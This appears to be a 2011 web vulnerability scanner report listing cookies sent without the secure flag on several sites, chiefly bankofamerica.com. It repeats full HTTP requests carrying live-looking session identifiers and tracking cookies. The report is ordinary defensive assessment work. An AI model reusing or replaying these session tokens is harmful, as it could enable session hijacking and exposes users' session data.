PHPSESSID=anqbi8c98lhrc9t5dv43unlak6; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: support.sentrigo.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSd27384b3a2299db58d67110ef35da57a=kg3uc9rp83bgra0g4d9ddtn3i3; _mkto_trk=id:172-VIM-170&token:_mch-sentrigo.com-1303780496241-25669; __utmz=75719754.1303780499.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=75719754.1100420185.1303780499.1303780499.1303780499.1; __utmc=75719754; __utmb=75719754.1.10.1303780499
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.bankofamerica.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /homepage/stateSelect.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login.aspx HTTP/1.1 Host: www.mysecureconnect.com Connection: keep-alive Referer: http://www.secureconnect.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The following cookie was issued by the application and does not have the secure flag set:
BIGipServerlct-pool=171237898.38687.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sfga.js HTTP/1.1 Host: lct.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Resin/3.1.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Type: text/javascript Date: Tue, 26 Apr 2011 12:40:18 GMT Connection: close Set-Cookie: BIGipServerlct-pool=171237898.38687.0000; path=/ Content-Length: 9247
var _kd = document; var _kdlh = _kd.location.href; var _ki,_kq,_kv; var _kwtlForm; var _kretURL; var _kwtlOnSubmit; var _koid;
function __krand() { return Math.round(Math.random() * 256).toString ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login/login.aspx?sgt=3&_tps=53e1d1d2ef5543dabbbb6e0d12a34f8b HTTP/1.1 Host: olui2.fs.ml.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sm/PANscan/ HTTP/1.1 Host: securitymetrics.com Connection: keep-alive Referer: https://securitymetrics.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>SecurityMe ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sm/determinesaq/reset?resellerid= HTTP/1.1 Host: securitymetrics.com Connection: keep-alive Referer: https://securitymetrics.com/pricelist.adp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sm/determinesaq/storechd HTTP/1.1 Host: securitymetrics.com Connection: keep-alive Referer: https://securitymetrics.com/pricelist.adp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Deter ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sm/determinesaq/terminaltype HTTP/1.1 Host: securitymetrics.com Connection: keep-alive Referer: https://securitymetrics.com/sm/determinesaq/storechd Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ask=6079AC2AB30386BACFA6271443B6ADF05606CD00A32572DEDFF96E6807D06F37DEDC73149F4231D58EA; smsid=868043594333d3db4590b2723770d82890feecf4
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Deter ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /snap_shots.js HTTP/1.1 Host: shots-s.snap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
//<!-- /*! Snap Shots Code Copyright (c) 2009, Snap Technologies, Inc. All rights reserved. * Your use of this code is subject to the Snap Shots Terms of Service * located at https://account.snap ...[SNIP]...
The following cookie was issued by the application and does not have the secure flag set:
zenid=7fb8442f26d1db353ad8306c5db292f6; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.php?main_page=product_info&cPath=5&products_id=9 HTTP/1.1 Host: store.tenable.com Connection: keep-alive Referer: http://www.tenable.com/services/nessus-perimeter-service?gclid=CNLb8cPsuKgCFQbe4AodEirYCA User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /support-center/ HTTP/1.1 Host: support.tenable.com Connection: keep-alive Referer: https://store.tenable.com/index.php?main_page=product_info&cPath=5&products_id=9 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __switchTo5x=63; __unam=ece3cfc-12f8f0cc5fa-d0c182-1
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c HTTP/1.1 Host: tc.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; state=MA; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; hp_beta=B; cmTPSet=Y; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; TLTSID=0391ABCE700010701FF8C9030944B980; throttle_value=35;
The following cookie was issued by the application and does not have the secure flag set:
INTL_LANG=en_US
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Control.do?body=where_passcode_popup HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The following cookie was issued by the application and does not have the secure flag set:
INTL_LANG=en_US
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookies were issued by the application and do not have the secure flag set:
BOFA_LOCALE_COOKIE=en-US; Path=/
WAOR=1726259115.281.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /deposits/cds-iras.go?request_locale=en_US HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The following cookies were issued by the application and do not have the secure flag set:
BOFA_LOCALE_COOKIE=en-US; Path=/
WAOR=1726259115.281.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /deposits/checking-accounts.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The following cookies were issued by the application and do not have the secure flag set:
BOFA_LOCALE_COOKIE=en-US; Path=/
WAOR=1726259115.281.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /deposits/savings-accounts.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The following cookies were issued by the application and do not have the secure flag set:
BOFA_LOCALE_COOKIE=en-US; Path=/
WAOR=1726259115.281.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /deposits/special-programs/add-it-up.go?request_locale=en_US HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The following cookies were issued by the application and do not have the secure flag set:
BOFA_LOCALE_COOKIE=en-US; Path=/
WAOR=1726259115.281.0000; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /deposits/special-programs/keep-the-change.go HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /military HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /privacy HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The following cookie was issued by the application and does not have the secure flag set:
INTL_LANG=en_US
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy/Control.do?body=privacysecur_unauthorised_acc_use HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
The following cookie was issued by the application and does not have the secure flag set:
INTL_LANG=en_US
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy/index.jsp HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: STATE=MA; JSESSIONID=0000EAGe-uElquZoP0ZnQj4l-pW:15bvh4t33; cmRS=&t1=1303820707087&t2=1303820723258&t3=1303820743960&t4=1303820700464<i=1303820743960&ln=signin_link_services&hr=javascript%3Avoid%280%29%3B&fti=&fn=SiteSearchForm%3A0%3BfrmSignIn%3A1%3BstateSelectForm%3A2%3BfrmLocator%3A3%3BotherServices%3A4%3B&ac=&fd=&uer=&fu=&pi=homepage%3AContent%3APersonal%3Bhome_personal&ho=sofa.bankofamerica.com/eluminate%3F&ci=90010394; BIGipServerngen-www.80=1554429611.20480.0000; TCID=0007af7b-75a9-ac5c-89b0-86020000003c; LANG_COOKIE=en_US; CFTOKEN=3f15f9f%2D00063147%2Db9c9%2D1db6%2Db5c9%2Dffffffff4552; CMAVID=none; state=MA; PROMO=000309029q890000g161; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; TRACKING_CODE=000309029q890000g161; cmTPSet=Y; hp_beta=B; CFID=132569126; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_COM_BT_ELIGIBLE=No; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; ngen_throttle=964; CONTEXT=en_US; throttle_value=35; TLTSID=0391ABCE700010701FF8C9030944B980;
